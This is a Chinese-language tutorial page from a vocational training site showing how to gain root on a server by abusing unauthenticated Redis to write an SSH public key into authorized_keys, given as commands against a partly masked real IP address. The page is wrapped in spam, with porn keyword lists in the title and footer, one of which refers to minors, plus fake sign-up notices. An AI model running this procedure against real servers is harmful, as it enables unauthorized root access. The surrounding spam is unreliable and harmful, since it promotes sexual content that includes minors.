麻豆黑色丝袜jk制服福利网站-麻豆精品传媒视频观看-麻豆精品传媒一二三区在线视频-麻豆精选传媒4区2021-在线视频99-在线视频a

千鋒教育-做有情懷、有良心、有品質的職業教育機構

手機站
千鋒教育

千鋒學習站 | 隨時隨地免費學

千鋒教育

掃一掃進入千鋒手機站

領取全套視頻
千鋒教育

關注千鋒學習站小程序
隨時隨地免費學習課程

當前位置:首頁  >  技術干貨  > redis未授權訪問配合ssh免密登錄getshell

redis未授權訪問配合ssh免密登錄getshell

來源:千鋒教育
發布人:wjy
時間: 2022-09-08 13:55:02 1662616502

  在一次滲透測試中拿到一個ip地址52.80.249.xx,nmap端口掃描出22,6379,80端口,目標機是linux系統的一臺服務器,6379為redis的默認端口,嘗試對其進行利用。使用kali作為攻擊機

  一、環境準備

  1.1、在攻擊機上面下載redis

  wget http://download.redis.io/releases/redis-2.8.17.tar.gz

redis未授權訪問配合ssh免密登錄getshell1

  1.2解壓文件,執行文件

  解壓文件:

  tar xzf redis-2.8.17.tar.gz

  進入redis目錄:

  cd redis-2.8.17

  安裝:make

redis未授權訪問配合ssh免密登錄getshell2

  1.3、進入src目錄,將redis-server和redis-cli拷貝到/usr/bin目錄下(這樣以后啟動redis就不用進入安裝目錄了)

  cd src

  cp redis-server /usr/bin

  cp redis-cli /usr/bin

redis未授權訪問配合ssh免密登錄getshell3

  1.4、返回目錄redis-2.8.17,將redis.conf拷貝到/etc/目錄下

  cd ../

  cp redis.conf /etc/

redis未授權訪問配合ssh免密登錄getshell4

  1.5、使用/etc/目錄下的reids.conf文件中的配置啟動redis服務:

  redis-server /etc/redis.conf

redis未授權訪問配合ssh免密登錄getshell5

  1.6、然后ctrl+c退出,再次進入src目錄然后連接目標靶機的redis服務

  ctrl+c

  cd src

  redis-cli –h 52.80.249.xx

redis未授權訪問配合ssh免密登錄getshell6

  出現52.80.249.xx:6379>就代表連接成功,并且沒有輸入密碼

  二、漏洞利用

  2.1、這里附上一個這里沒法利用的一種 攻擊方式截圖(沒有測試僅供參考)

redis未授權訪問配合ssh免密登錄getshell7

  2.2、我們這里是不知道路徑的,根據前期信息收集知道還有ssh服務的22端口是開放的,可以利用“公私鑰”認證獲取root權限

  使用ssh生成公鑰和私鑰文件

  ssh-keygen -t rsa

redis未授權訪問配合ssh免密登錄getshell8

  2.3、進入.ssh文件下,將上面生成的公鑰保存到1.txt里面

  cd /root/.ssh

  (echo -e "\n\n";cat id_rsa.pub; echo -e "\n\n") > 1.txt

redis未授權訪問配合ssh免密登錄getshell9

  2.4、將生成的公鑰文件通過redis上傳到目標服務器

  cat 1.txt | redis-cli -h 52.80.249.xx -x set crack

redis未授權訪問配合ssh免密登錄getshell10

  2.5、遠程連接redis服務

  redis-cli -h 52.80.249.xx

redis未授權訪問配合ssh免密登錄getshell11

  2.6、獲得redis備份的路徑

  config get dir

redis未授權訪問配合ssh免密登錄getshell12

  2.7、更改redis備份路徑為ssh公鑰存放目錄(一般默認為/root/.ssh):

redis未授權訪問配合ssh免密登錄getshell13

  2.8、設置上傳公鑰的備份文件名字為authorized_keys:

  config set dbfilename authorized_keys

redis未授權訪問配合ssh免密登錄getshell14

  2.9、檢查是否更改成功(查看有沒有authorized_keys文件),沒有問題就保存然后退出,至此成功寫入ssh公鑰到靶機

  config get dbfilename

redis未授權訪問配合ssh免密登錄getshell15

  2.10、攻擊機直接ssh連接目標服務器

  ssh -i id_rsa root@52.80.249.xx

redis未授權訪問配合ssh免密登錄getshell16

tags:
聲明:本站稿件版權均屬千鋒教育所有,未經許可不得擅自轉載。
10年以上業內強師集結,手把手帶你蛻變精英
請您保持通訊暢通,專屬學習老師24小時內將與您1V1溝通
免費領取
今日已有369人領取成功
劉同學 138****2860 剛剛成功領取
王同學 131****2015 剛剛成功領取
張同學 133****4652 剛剛成功領取
李同學 135****8607 剛剛成功領取
楊同學 132****5667 剛剛成功領取
岳同學 134****6652 剛剛成功領取
梁同學 157****2950 剛剛成功領取
劉同學 189****1015 剛剛成功領取
張同學 155****4678 剛剛成功領取
鄒同學 139****2907 剛剛成功領取
董同學 138****2867 剛剛成功領取
周同學 136****3602 剛剛成功領取
相關推薦HOT
主站蜘蛛池模板: a级毛片视频| 久草资源| 日本大片免a费观看在线| 工囗番漫画全彩无遮拦老师| 国产欧美日韩精品专区| 国产va免费精品观看精品| 美女羞羞视频网站| 欧美午夜成年片在线观看| 麻豆天美精东果冻星空| 高清欧美一区二区三区| 快点cao我要被cao烂了| 91热视频在线观看| 国产黄色片91| 久久久久国产精品| 经典三级在线播放| 免费一级做a爰片久久毛片潮喷| 日本黄色电影在线| 最近中文字幕精彩视频| 国产三级免费观看| 亚洲狠狠婷婷综合久久久久| 又粗又硬又黄又爽的免费视频| 八戒网站免费观看视频| 999国产精品999久久久久久| 免费无毒片在线观看| 欧美黄色片网址| 果冻传媒国产仙踪林欢迎你| 欧美一区二区三区精华液| 中文字幕日韩欧美一区二区三区| 12至16末成年毛片| 精品久久久久国产免费| 国产色综合天天综合网| 久久4k岛国高清一区二区| 波多野结衣中文字幕一区| 一本久久a久久精品vr综合| 别揉我胸啊嗯~| 欧美日韩中文字幕在线| 国产动作大片中文字幕| 动漫痴汉电车| 午夜电影免费观看| 日韩三级免费看| 高清videosgratis欧洲69|